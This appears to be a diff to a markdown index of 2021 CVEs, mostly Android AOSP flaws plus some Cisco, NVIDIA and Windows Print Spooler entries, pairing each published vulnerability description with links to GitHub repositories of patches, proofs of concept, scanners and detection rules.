+### CVE-2021-0333 (2021-02-10)
+
+In onCreate of BluetoothPermissionActivity.java, there is a possible permissions bypass due to a tapjacking overlay that obscures the phonebook permissions dialog when a Bluetooth device is connecting. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-168504491
+
+
+- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333)
+
+### CVE-2021-0334 (2021-02-10)
+
+In onTargetSelected of ResolverActivity.java, there is a possible settings bypass allowing an app to become the default handler for arbitrary domains. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-163358811
+
+
+- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334)
+
+### CVE-2021-0336 (2021-02-10)
+
+In onReceive of BluetoothPermissionRequest.java, there is a possible permissions bypass due to a mutable PendingIntent. This could lead to local escalation of privilege that bypasses a permission check, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-158219161
+
+
+- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336)
+
+### CVE-2021-0337 (2021-02-10)
+
+In moveInMediaStore of FileSystemProvider.java, there is a possible file exposure due to stale metadata. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-157474195
+
+
+- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337)
+
+### CVE-2021-0339 (2021-02-10)
+
+In loadAnimation of WindowContainer.java, there is a possible way to keep displaying a malicious app while a target app is brought to the foreground. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-8.1 Android-9Android ID: A-145728687
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0339](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0339)
+
+### CVE-2021-0340 (2021-02-10)
+
+In parseNextBox of IsoInterface.java, there is a possible leak of unredacted location information due to improper input validation. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-134155286
+
+
+- [Satheesh575555/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340](https://github.com/Satheesh575555/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340)
+- [nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340](https://github.com/nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340)
+
+### CVE-2021-0390 (2021-03-10)
+
+In various methods of WifiNetworkSuggestionsManager.java, there is a possible modification of suggested networks due to a missing permission check. This could lead to local escalation of privilege by a background user on the same device with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174749461
+
+
+- [uthrasri/frameworks_opt_net_wifi_CVE-2021-0390](https://github.com/uthrasri/frameworks_opt_net_wifi_CVE-2021-0390)
+
+### CVE-2021-0391 (2021-03-10)
+
+In onCreate() of ChooseTypeAndAccountActivity.java, there is a possible way to learn the existence of an account, without permissions, due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-172841550
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0391](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0391)
+
+### CVE-2021-0392 (2021-03-10)
+
+In main of main.cpp, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-175124730
+
+
+- [uthrasri/System_Connectivity_Wificond_CVE-2021-0392](https://github.com/uthrasri/System_Connectivity_Wificond_CVE-2021-0392)
+
+### CVE-2021-0393 (2021-03-10)
+
+In Scanner::LiteralBuffer::NewCapacity of scanner.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution if an attacker can supply a malicious PAC file, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-168041375
+
+
+- [Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393](https://github.com/Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393)
+
+### CVE-2021-0394 (2021-03-10)
+
+In android_os_Parcel_readString8 of android_os_Parcel.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-172655291
+
+
+- [nanopathi/packages_apps_Settings_CVE-2021-0394](https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0394)
+- [Trinadh465/platform_art_CVE-2021-0394](https://github.com/Trinadh465/platform_art_CVE-2021-0394)
+
+### CVE-2021-0396 (2021-03-10)
+
+In Builtins::Generate_ArgumentsAdaptorTrampoline of builtins-arm.cc and related files, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution in an unprivileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-160610106
+
+
+- [Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396](https://github.com/Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396)
+
+### CVE-2021-0397 (2021-03-10)
+
+In sdp_copy_raw_data of sdp_discovery.cc, there is a possible system compromise due to a double free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174052148
+
+
+- [Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397](https://github.com/Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397)
+
+### CVE-2021-0399 (2021-03-10)
+
+In qtaguid_untag of xt_qtaguid.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-176919394References: Upstream kernel
+
+
+- [nipund513/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-](https://github.com/nipund513/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-)
+
+### CVE-2021-0431 (2021-04-13)
+
+In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a paired device with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174149901
+
+
+- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431)
+- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0431](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0431)
+
+### CVE-2021-0433 (2021-04-13)
+
+In onCreate of DeviceChooserActivity.java, there is a possible way to bypass user consent when pairing a Bluetooth device due to a tapjacking/overlay attack. This could lead to local escalation of privilege and pairing malicious devices with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-171221090
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433)
+
+### CVE-2021-0435 (2021-04-13)
+
+In avrc_proc_vendor_command of avrc_api.cc, there is a possible leak of heap data due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174150451
+
+
+- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0435](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0435)
+- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435)
+
+### CVE-2021-0437 (2021-04-13)
+
+In setPlayPolicy of DrmPlugin.cpp, there is a possible double free. This could lead to local escalation of privilege in a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-176168330
+
+
+- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437)
+
+### CVE-2021-0466 (2021-06-11)
+
+In startIpClient of ClientModeImpl.java, there is a possible identifier which could be used to track a device. This could lead to remote information disclosure to a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-154114734
+
+
+- [uthrasri/frameworks_opt_net_wifi_CVE-2021-0466](https://github.com/uthrasri/frameworks_opt_net_wifi_CVE-2021-0466)
+
+### CVE-2021-0472 (2021-06-11)
+
+In shouldLockKeyguard of LockTaskController.java, there is a possible way to exit App Pinning without a PIN due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-176801033
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0472](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0472)
+
+### CVE-2021-0474 (2021-06-11)
+
+In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-177611958
+
+
+- [pazhanivel07/system_bt_A10-r33_CVE-2021-0474](https://github.com/pazhanivel07/system_bt_A10-r33_CVE-2021-0474)
+- [pazhanivel07/system_bt_A10_r33_CVE-2021-0474](https://github.com/pazhanivel07/system_bt_A10_r33_CVE-2021-0474)
+
+### CVE-2021-0475 (2021-06-11)
+
+In on_l2cap_data_ind of btif_sock_l2cap.cc, there is possible memory corruption due to a use after free. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-175686168
+
+
+- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0475](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0475)
+
+### CVE-2021-0476 (2021-06-11)
+
+In FindOrCreatePeer of btif_av.cc, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-169252501
+
+
+- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0476](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0476)
+
+### CVE-2021-0478 (2021-06-21)
+
+In updateDrawable of StatusBarIconView.java, there is a possible permission bypass due to an uncaught exception. This could lead to local escalation of privilege by running foreground services without notifying the user, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-169255797
+
+
+- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478)
+
+### CVE-2021-0481 (2021-06-11)
+
+In onActivityResult of EditUserPhotoController.java, there is a possible access of unauthorized files due to an unexpected URI handler. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-172939189
+
+
+- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481)
+
+### CVE-2021-0506 (2021-06-21)
+
+In ActivityPicker.java, there is a possible bypass of user interaction in intent resolution due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-181962311
+
+
+- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506)
+
+### CVE-2021-0507 (2021-06-21)
+
+In handle_rc_metamsg_cmd of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181860042
+
+
+- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0507](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0507)
+
+### CVE-2021-0508 (2021-06-21)
+
+In various functions of DrmPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-176444154
+
+
+- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508)
+
+### CVE-2021-0509 (2021-06-21)
+
+In various functions of CryptoPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444161
+
+
+- [Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509](https://github.com/Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509)
+
+### CVE-2021-0510 (2021-06-21)
+
+In decrypt_1_2 of CryptoPlugin.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444622
+
+
+- [pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510](https://github.com/pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510)
+
+### CVE-2021-0511 (2021-06-21)
+
+In Dex2oat of dex2oat.cc, there is a possible way to inject bytecode into an app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-178055795
+
+
+- [Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511](https://github.com/Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511)
+
+### CVE-2021-0513 (2021-06-21)
+
+In deleteNotificationChannel and related functions of NotificationManagerService.java, there is a possible permission bypass due to improper state validation. This could lead to local escalation of privilege via hidden services with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-156090809
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0513](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0513)
+
+### CVE-2021-0516 (2021-06-21)
+
+In p2p_process_prov_disc_req of p2p_pd.c, there is a possible out of bounds read and write due to a use after free. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181660448
+
+
+- [Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516](https://github.com/Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516)
+
+### CVE-2021-0519 (2021-08-17)
+
+In BITSTREAM_FLUSH of ih264e_bitstream.h, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-176533109
+
+
+- [nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519](https://github.com/nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519)
+
+### CVE-2021-0520 (2021-06-21)
+
+In several functions of MemoryFileSystem.cpp and related files, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-176237595
+
+
+- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520)
+- [ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520](https://github.com/ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520)
+
+### CVE-2021-0522 (2021-06-21)
+
+In ConnectionHandler::SdpCb of connection_handler.cc, there is a possible out of bounds read due to a use after free. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-174182139
+
+
+- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0522](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0522)
+
+### CVE-2021-0586 (2021-07-14)
+
+In onCreate of DevicePickerFragment.java, there is a possible way to trick the user to select an unwanted bluetooth device due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-182584940
+
+
+- [nanopathi/packages_apps_Settings_CVE-2021-0586](https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0586)
+
+### CVE-2021-0589 (2021-07-14)
+
+In BTM_TryAllocateSCN of btm_scn.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-180939982
+
+
+- [Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589)
+- [Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589)
+
+### CVE-2021-0594 (2021-07-14)
+
+In onCreate of ConfirmConnectActivity, there is a possible remote bypass of user consent due to improper input validation. This could lead to remote (proximal, NFC) escalation of privilege allowing an attacker to deceive a user into allowing a Bluetooth connection with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-176445224
+
+
+- [Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594](https://github.com/Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594)
+
+### CVE-2021-0595 (2021-10-06)
+
+In lockAllProfileTasks of RootWindowContainer.java, there is a possible way to access the work profile without the profile PIN, after logging in. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-177457096
+
+
+- [pazhanivel07/Settings-CVE-2021-0595](https://github.com/pazhanivel07/Settings-CVE-2021-0595)
+- [pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595](https://github.com/pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595)
+
+### CVE-2021-0600 (2021-07-14)
+
+In onCreate of DeviceAdminAdd.java, there is a possible way to mislead a user to activate a device admin app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-179042963
+
+
+- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600)
+
+### CVE-2021-0640 (2021-08-17)
+
+In noteAtomLogged of StatsdStats.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-187957589
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640)
+
+### CVE-2021-0652 (2021-10-22)
+
+In VectorDrawable::VectorDrawable of VectorDrawable.java, there is a possible way to introduce a memory corruption due to sharing of not thread-safe objects. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-185178568
+
+
+- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652)
+
+### CVE-2021-0683 (2021-10-06)
+
+In runTraceIpcStop of ActivityManagerShellCommand.java, there is a possible deletion of system files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-185398942
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708)
+
+### CVE-2021-0688 (2021-10-06)
+
+In lockNow of PhoneWindowManager.java, there is a possible lock screen bypass due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-161149543
+
+
+- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688)
+
+### CVE-2021-0705 (2021-10-22)
+
+In sanitizeSbn of NotificationManagerService.java, there is a possible way to keep service running in foreground and keep granted permissions due to Bypass of Background Service Restrictions. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-185388103
+
+
+- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705)
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705)
+
+### CVE-2021-0928 (2021-12-15)
+
+In createFromParcel of OutputConfiguration.java, there is a possible parcel serialization/deserialization mismatch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-188675581
+
+
+- [michalbednarski/ReparcelBug2](https://github.com/michalbednarski/ReparcelBug2)
+
+### CVE-2021-0954 (2021-12-15)
+
+In ResolverActivity, there is a possible user interaction bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-143559931
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0954](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0954)
+
+### CVE-2021-0963 (2021-12-15)
+
+In onCreate of KeyChainActivity.java, there is a possible way to use an app certificate stored in keychain due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-199754277
+
+
+- [Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963](https://github.com/Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963)
+
+### CVE-2021-22
+- [LingerANR/CVE-2021-22-555](https://github.com/LingerANR/CVE-2021-22-555)
+
+### CVE-2021-403
+- [rhysmcneill/CVE-2021-403](https://github.com/rhysmcneill/CVE-2021-403)
+
+### CVE-2021-521
+- [NagendraPittu/CVE-2021-521-Exploit](https://github.com/NagendraPittu/CVE-2021-521-Exploit)
+
+### CVE-2021-1056 (2021-01-08)
+
+NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.
+
+
+- [pokerfaceSad/CVE-2021-1056](https://github.com/pokerfaceSad/CVE-2021-1056)
+
+### CVE-2021-1366 (2021-02-17)
+
+A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack on an affected device if the VPN Posture (HostScan) Module is installed on the AnyConnect client. This vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges. To exploit this vulnerability, the attacker needs valid credentials on the Windows system.
+
+
+- [koztkozt/CVE-2021-1366](https://github.com/koztkozt/CVE-2021-1366)
+
+### CVE-2021-1480 (2021-04-07)
+
+Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or allow an authenticated, local attacker to gain escalated privileges on an affected system. For more information about these vulnerabilities, see the Details section of this advisory.
+
+
+- [xmco/sdwan-cve-2021-1480](https://github.com/xmco/sdwan-cve-2021-1480)
+
+### CVE-2021-1497 (2021-05-05)
+
+Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
+
+
+- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack)
+
+### CVE-2021-1585 (2021-07-07)
+
+A vulnerability in the Cisco Adaptive Security Device Manager (ASDM) Launcher could allow an unauthenticated, remote attacker to execute arbitrary code on a user's operating system. This vulnerability is due to a lack of proper signature verification for specific code exchanged between the ASDM and the Launcher. An attacker could exploit this vulnerability by leveraging a man-in-the-middle position on the network to intercept the traffic between the Launcher and the ASDM and then inject arbitrary code. A successful exploit could allow the attacker to execute arbitrary code on the user's operating system with the level of privileges assigned to the ASDM Launcher. A successful exploit may require the attacker to perform a social engineering attack to persuade the user to initiate communication from the Launcher to the ASDM.
+
+
+- [jbaines-r7/staystaystay](https://github.com/jbaines-r7/staystaystay)
+
+### CVE-2021-1636 (2021-01-12)
+
+Microsoft SQL Elevation of Privilege Vulnerability
+
+
+- [Nate0634034090/bug-free-memory](https://github.com/Nate0634034090/bug-free-memory)
+
+### CVE-2021-1647 (2021-01-12)
+
+Microsoft Defender Remote Code Execution Vulnerability
+
+
+- [findcool/cve-2021-1647](https://github.com/findcool/cve-2021-1647)
+
+### CVE-2021-1656 (2021-01-12)
+
+TPM Device Driver Information Disclosure Vulnerability
+
+
+- [waleedassar/CVE-2021-1656](https://github.com/waleedassar/CVE-2021-1656)
+
+### CVE-2021-1675 (2021-06-08)
+
+Windows Print Spooler Remote Code Execution Vulnerability
+
+
+- [yu2u/CVE-2021-1675](https://github.com/yu2u/CVE-2021-1675)
+- [cube0x0/CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675)
+- [LaresLLC/CVE-2021-1675](https://github.com/LaresLLC/CVE-2021-1675)
+- [kondah/patch-cve-2021-1675](https://github.com/kondah/patch-cve-2021-1675)
+- [evilashz/CVE-2021-1675-LPE-EXP](https://github.com/evilashz/CVE-2021-1675-LPE-EXP)
+- [hlldz/CVE-2021-1675-LPE](https://github.com/hlldz/CVE-2021-1675-LPE)
+- [puckiestyle/CVE-2021-1675](https://github.com/puckiestyle/CVE-2021-1675)
+- [cybersecurityworks553/CVE-2021-1675_PrintNightMare](https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare)
+- [tanarchytan/CVE-2021-1675](https://github.com/tanarchytan/CVE-2021-1675)
+- [calebstewart/CVE-2021-1675](https://github.com/calebstewart/CVE-2021-1675)
+- [Leonidus0x10/CVE-2021-1675-SCANNER](https://github.com/Leonidus0x10/CVE-2021-1675-SCANNER)
+- [thomasgeens/CVE-2021-1675](https://github.com/thomasgeens/CVE-2021-1675)
+- [mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery](https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery)
+- [killtr0/CVE-2021-1675-PrintNightmare](https://github.com/killtr0/CVE-2021-1675-PrintNightmare)
+- [corelight/CVE-2021-1675](https://github.com/corelight/CVE-2021-1675)
+- [kougyokugentou/CVE-2021-1675](https://github.com/kougyokugentou/CVE-2021-1675)
+- [ptter23/CVE-2021-1675](https://github.com/ptter23/CVE-2021-1675)
+- [initconf/cve-2021-1675-printnightmare](https://github.com/initconf/cve-2021-1675-printnightmare)
+- [ozergoker/PrintNightmare](https://github.com/ozergoker/PrintNightmare)
+- [exploitblizzard/PrintNightmare-CVE-2021-1675](https://github.com/exploitblizzard/PrintNightmare-CVE-2021-1675)
+- [edsonjt81/CVE-2021-1675](https://github.com/edsonjt81/CVE-2021-1675)
+- [sailay1996/PrintNightmare-LPE](https://github.com/sailay1996/PrintNightmare-LPE)
+- [JumpsecLabs/PrintNightmare](https://github.com/JumpsecLabs/PrintNightmare)
+- [bartimusprimed/CVE-2021-1675-Yara](https://github.com/bartimusprimed/CVE-2021-1675-Yara)
+- [k8gege/cve-2021-1675](https://github.com/k8gege/cve-2021-1675)
+- [galoget/PrintNightmare-CVE-2021-1675-CVE-2021-34527](https://github.com/galoget/PrintNightmare-CVE-2021-1675-CVE-2021-34527)
+- [thalpius/Microsoft-CVE-2021-1675](https://github.com/thalpius/Microsoft-CVE-2021-1675)
